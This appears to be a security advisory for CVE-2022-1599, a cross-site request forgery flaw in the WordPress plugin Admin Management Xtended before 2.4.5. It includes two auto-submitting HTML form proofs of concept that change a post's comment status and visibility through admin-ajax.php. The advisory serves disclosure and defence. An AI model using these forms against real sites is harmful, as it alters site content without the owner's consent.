Lucene search
Daniel RufWPEX-ID:4A36E876-7E3B-4A81-9F16-9FF5FBB20DD6HistoryJun 20, 2022 - 12:00 a.m.
Admin Management Xtended < 2.4.5 - Post Visibility/Date/Comment Status Update via CSRF
2022-06-2000:00:00
Daniel Ruf
83
cross-site request forgery
wordpress
post visibility update
comment status
exploit
EPSS
0.001
Percentile
26.3%
The plugin does not have CSRF checks in some of its AJAX actions, allowing attackers to make a logged users with the right capabilities to call them. This can lead to changes in post status (draft, published), slug, post date, comment status (enabled, disabled) and more.
The following PoC codes are for post ID 1 (rndval is really just a random value):
<form id="test" action="https://example.com/wp-admin/admin-ajax.php" method="POST">
<input type="text" name="action" value="ame_ajax_set_commentstatus">
<input type="text" name="postid" value="1">
<input type="text" name="comment_status" value="1">
<input type="text" name="posttype" value="post">
<input type="text" name="rndval" value="123">
</form>
<script>
document.getElementById("test").submit();
</script>
<form id="test" action="https://example.com/wp-admin/admin-ajax.php" method="POST">
<input type="text" name="action" value="ame_toggle_visibility">
<input type="text" name="category_id" value="1">
<input type="text" name="vis_status" value="draft">
<input type="text" name="posttype" value="post">
<input type="text" name="rndval" value="123">
</form>
<script>
document.getElementById("test").submit();
</script>Related
patchstack
patchstack
cnvd
cnvd
WordPress Admin Management Xtended pluginθ·¨η«θ―·ζ±δΌͺι ζΌζ΄
2022-07-13 00:00:00
osv
osv
CVE-2022-1599
2022-07-11 13:15:08
cve
cve
CVE-2022-1599
2022-07-11 13:15:08
wpvulndb
wpvulndb
nvd
nvd
CVE-2022-1599
2022-07-11 13:15:08
cvelist
cvelist
prion
prion
Cross site request forgery (csrf)
2022-07-11 13:15:00